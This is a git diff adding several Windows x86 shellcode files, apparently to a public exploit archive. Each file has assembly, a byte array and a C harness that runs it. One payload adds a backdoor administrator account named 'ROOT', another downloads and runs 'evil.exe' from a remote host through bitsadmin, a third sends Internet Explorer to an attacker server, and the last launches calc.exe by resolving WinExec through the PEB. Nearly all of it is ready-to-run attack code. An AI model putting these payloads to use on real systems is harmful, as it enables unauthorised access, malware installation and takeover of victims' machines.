+"\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3"
+"\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b"
+"\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57"
+"\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc"
+"\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3"
+"\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b"
+"\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24"
+"\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41"
+"\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68"
+"\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41"
+"\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67"
+"\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
+"\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30"
+"\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68"
+"\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63"
+"\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
+"\x89\xe0\x51\x50\xff\xd3";
+
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int(*)()) code;
+  (int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/47041.c b/shellcodes/windows_x86/47041.c
new file mode 100644
index 000000000..e38073971
--- /dev/null
+++ b/shellcodes/windows_x86/47041.c
@@ -0,0 +1,89 @@
+/*
+; Shellcode Title : bitsadmin download and execute
+; Shellcode Author : Joseph McDonagh
+; Date June 26, 2019
+; Shellcode Length 210
+; However, if the application you are exploiting already loads it, then all you need ...
+; ... is the System Call and ExitProcess in kernel32.dll
+; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
+; ... relatively slow bitsadmin.exe program
+; Tested on Windows XP SP2
+; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
+; after reading iamroot blog
+; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
+; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
+; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
+;
+; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
+
+
+xor eax, eax             ;Get the msvcrt.dll
+mov ax, 0x7472           ;"tr\0\0"
+push eax
+push dword 0x6376736d    ;"cvsm"
+push esp
+
+; LoadLibrary
+mov ebx, 0x7c801d77      ;Address of function LoadLibraryA (winxp)
+call ebx
+mov ebp, eax             ;msvcrt.dll is saved in ebp
+
+xor eax, eax
+push eax
+
+push 0x6578652e ; exe.
+push 0x6c697665 ; live
+push 0x5c3a6320 ; \:c 
+push 0x632f2065 ; c/ e
+push 0x78652e64 ; xe.d
+push 0x6d632026 ; mc &
+push 0x2620312e ; & 1.
+push 0x302e302e ; 0.0.
+push 0x37323120 ; 721 
+push 0x3033206e ; 03 n
+push 0x2d20676e ; - gn
+push 0x69702026 ; ip &
+push 0x26202265 ; & "e
+push 0x78652e6c ; xe.l
+push 0x6976655c ; ive\
+push 0x3a632220 ; :c" 
+push 0x6578652e ; exe.
+push 0x6c697665 ; live
+push 0x2f30312e ; /01.
+push 0x30312e38 ; 01.8
+push 0x36312e32 ; 61.2
+push 0x39312f2f ; 91//
+push 0x3a707474 ; :ptt
+push 0x68202230 ; h "0
+push 0x33626f6a ; 3boj
+push 0x6e222072 ; n" r
+push 0x6566736e ; efsn
+push 0x6172742f ; art/
+push 0x20657865 ;  exe
+push 0x2e6e696d ; .nim
+push 0x64617374 ; dast
+push 0x69622074 ; ib t
+push 0x72617473 ; rats
+
+mov edi,esp
+push edi
+mov eax, 0x77c293c7
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x7c81caa2
+call eax
+
+*/
+
+char code[]=
+
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/47042.c b/shellcodes/windows_x86/47042.c
new file mode 100644
index 000000000..e100ae39f
--- /dev/null
+++ b/shellcodes/windows_x86/47042.c
@@ -0,0 +1,66 @@
+/*
+# Title: start iexplore.exe
+# Author: Joseph McDonagh
+# Shellcode length 191
+# Could be smaller if the app your are exploiting loads msvcrt.
+# Purpose: Use the start command to open internet explorer and connect to a malicious web server
+# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
+# This code can exploit browser vulnerabilities without (or with) social engineering.
+# Tested on: WinXP SP 2
+# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/.  This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
+# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
+# 
+
+***** Assembly code follows *****
+
+; The portion loads msvcrt to make the syscall.
+; Hardcoded for winxp
+
+xor eax, eax             
+mov ax, 0x7472           
+push eax
+push dword 0x6376736d    
+push esp
+
+; LoadLibrary (hardcoded for Windows XP. 
+; Can find this on a debugger or arwin)
+mov ebx, 0x7c801d77    
+call ebx
+mov ebp, eax             
+
+xor eax, eax       
+PUSH eax                ; null terminator
+push 0x2f30312e	; /10.
+push 0x30312e38	; 01.8
+push 0x36312e32	; 61.2
+push 0x39312f2f	; 91//
+push 0x3a707474	; :ptt
+push 0x68206578	; h ex
+push 0x652e6572	; e.er
+push 0x6f6c7078	; olpx
+push 0x65692074	; ei t
+push 0x72617473	; rats
+
+; Below code moves the pointer and executes the system call that runs the command.
+
+mov edi,esp
+push edi
+mov eax, 0x77c293c7
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x7c81caa2
+call eax
+*/
+
+char code[]=
+
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/48116.c b/shellcodes/windows_x86/48116.c
new file mode 100644
index 000000000..521b0efe8
--- /dev/null
+++ b/shellcodes/windows_x86/48116.c
@@ -0,0 +1,147 @@
+# Title:  Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
+# Shellcode Author: Bobby Cooke
+# Date: 2020-02-21
+# Technique: PEB & Export Directory Table
+# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
+
+_start:
+; Create a new stack frame
+ mov ebp, esp            ; Set base stack pointer for new stack-frame
+ sub esp, 0x20           ; Decrement the stack by 32 bytes
+
+; Find kernel32.dll base address
+ xor ebx, ebx            ; EBX = 0x00000000
+ mov ebx, [fs:ebx+0x30]  ; EBX = Address_of_PEB
+ mov ebx, [ebx+0xC]      ; EBX = Address_of_LDR
+ mov ebx, [ebx+0x1C]     ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
+ mov ebx, [ebx]          ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+ mov ebx, [ebx]          ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
+ mov eax, [ebx+0x8]      ; EAX = &kernel32.dll / Address of kernel32.dll
+ mov [ebp-0x4], eax      ; [EBP-0x04] = &kernel32.dll
+
+; Find the address of the WinExec Symbol within kernel32.dll
+; + The hex values will change with different versions of Windows
+
+; Find the address of the Export Table within kernel32.dll
+ mov ebx, [eax+0x3C]     ; EBX = Offset NewEXEHeader  = 0xF8
+ add ebx, eax            ; EBX = &NewEXEHeader        = 0xF8 + &kernel32.dll
+ mov ebx, [ebx+0x78]     ; EBX = RVA ExportTable      = 0x777B0 = [&NewExeHeader + 0x78]
+ add ebx, eax            ; EBX = &ExportTable         = RVA ExportTable + &kernel32.dll
+
+; Find the address of the Name Pointer Table within kernel32.dll
+; + Contains pointers to strings of function names - 4-byte/dword entries
+ mov edi, [ebx+0x20]     ; EDI = RVA NamePointerTable = 0x790E0
+ add edi, eax            ; EDI = &NamePointerTable    = 0x790E0 + &kernel32.dll
+ mov [ebp-0x8], edi      ; save &NamePointerTable to stack frame
+
+; Find the address of the Ordinal Table
+;   - 2-byte/word entries
+ mov ecx, [ebx+0x24]     ; ECX = RVA OrdinalTable     = 0x7A9E8
+ add ecx, eax            ; ECX = &OrdinalTable        = 0x7A9E8 + &kernel32.dll
+ mov [ebp-0xC], ecx      ; save &OrdinalTable to stack-frame
+
+; Find the address of the Address Table
+ mov edx, [ebx+0x1C]     ; EDX = RVA AddressTable     = 0x777CC
+ add edx, eax            ; EDX = &AddressTable        = 0x777CC + &kernel32.dll
+ mov [ebp-0x10], edx     ; save &AddressTable to stack-frame
+
+; Find Number of Functions within the Export Table of kernel32.dll
+ mov edx, [ebx+0x14]     ; EDX = Number of Functions  = 0x642
+ mov [ebp-0x14], edx     ; save value of Number of Functions to stack-frame
+
+jmp short functions
+
+findFunctionAddr:
+; Initialize the Counter to prevent infinite loop
+ xor eax, eax            ; EAX = Counter = 0
+ mov edx, [ebp-0x14]     ; get value of Number of Functions from stack-frame
+; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
+searchLoop:
+ mov edi, [ebp-0x8]      ; EDI = &NamePointerTable
+ mov esi, [ebp+0x18]     ; ESI = Address of String for the Symbol we are searching for 
+ xor ecx, ecx            ; ECX = 0x00000000
+ cld                     ; clear direction flag - Process strings from left to right
+ mov edi, [edi+eax*4]    ; EDI = RVA NameString      = [&NamePointerTable + (Counter * 4)]
+ add edi, [ebp-0x4]      ; EDI = &NameString         = RVA NameString + &kernel32.dll
+ add cx, 0x8             ; ECX = len("WinExec,0x00") = 8 = 7 char + 1 Null
+ repe cmpsb              ; compare first 8 bytes of [&NameString] to "WinExec,0x00"
+ jz found                ; If string at [&NameString] == "WinExec,0x00", then end loop
+ inc eax                 ; else Counter ++
+ cmp eax, edx            ; Does EAX == Number of Functions?
+ jb searchLoop           ;   If EAX != Number of Functions, then restart the loop
+
+found:
+; Find the address of WinExec by using the last value of the Counter
+ mov ecx, [ebp-0xC]      ; ECX = &OrdinalTable
+ mov edx, [ebp-0x10]     ; EDX = &AddressTable
+ mov ax,  [ecx + eax*2]  ;  AX = ordinalNumber   = [&OrdinalTable + (Counter*2)]
+ mov eax, [edx + eax*4]  ; EAX = RVA WinExec     = [&AddressTable + ordinalNumber]
+ add eax, [ebp-0x4]      ; EAX = &WinExec        = RVA WinExec + &kernel32.dll
+ ret
+
+functions:
+; Create string 'WinExec\x00' on the stack and save its address to the stack-frame
+ mov edx, 0x63657878     ; "cexx"
+ shr edx, 8              ; Shifts edx register to the right 8 bits
+ push edx                ; "\x00,cex"
+ push 0x456E6957         ; EniW : 456E6957
+ mov [ebp+0x18], esp     ; save address of string 'WinExec\x00' to the stack-frame
+ call findFunctionAddr   ; After Return EAX will = &WinExec
+
+; Call WinExec( CmdLine, ShowState );
+;   CmdLine   = "calc.exe"
+;   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
+ xor ecx, ecx          ; clear eax register
+ push ecx              ; string terminator 0x00 for "calc.exe" string
+ push 0x6578652e       ; exe. : 6578652e
+ push 0x636c6163       ; clac : 636c6163
+ mov ebx, esp          ; save pointer to "calc.exe" string in eax
+ inc ecx               ; uCmdShow SW_SHOWNORMAL = 0x00000001
+ push ecx              ; uCmdShow  - push 0x1 to stack # 2nd argument
+ push ebx              ; lpcmdLine - push string address stack # 1st argument
+ call eax              ; Call the WinExec Function
+
+; Create string 'ExitProcess\x00' on the stack and save its address to the stack-frame
+ xor ecx, ecx          ; clear eax register
+ mov ecx, 0x73736501     ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string
+ shr ecx, 8              ; ecx = "ess",0x00 // shr shifts the register right 8 bits
+ push ecx                ;  sse : 00737365
+ push 0x636F7250         ; corP : 636F7250
+ push 0x74697845         ; tixE : 74697845
+ mov [ebp+0x18], esp     ; save address of string 'ExitProcess\x00' to stack-frame
+ call findFunctionAddr   ; After Return EAX will = &ExitProcess
+
+; Call ExitProcess(ExitCode)
+ xor edx, edx
+ push edx                ; ExitCode = 0
+ call eax                ; ExitProcess(ExitCode)
+
+; nasm -f win32 win32-WinExec_Calc-Exit.asm -o win32-WinExec_Calc-Exit.o
+; for i in $(objdump -D win32-WinExec_Calc-Exit.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+
+##################################################################################### 
+
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
+"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
+"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
+"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
+"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
+"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
+"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
+"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
+"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
+"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
+"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
+"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
+"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
+"\x52\xff\xd0";
+
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int(*)()) code;
+  (int)(*func)();
+}
\ No newline at end of file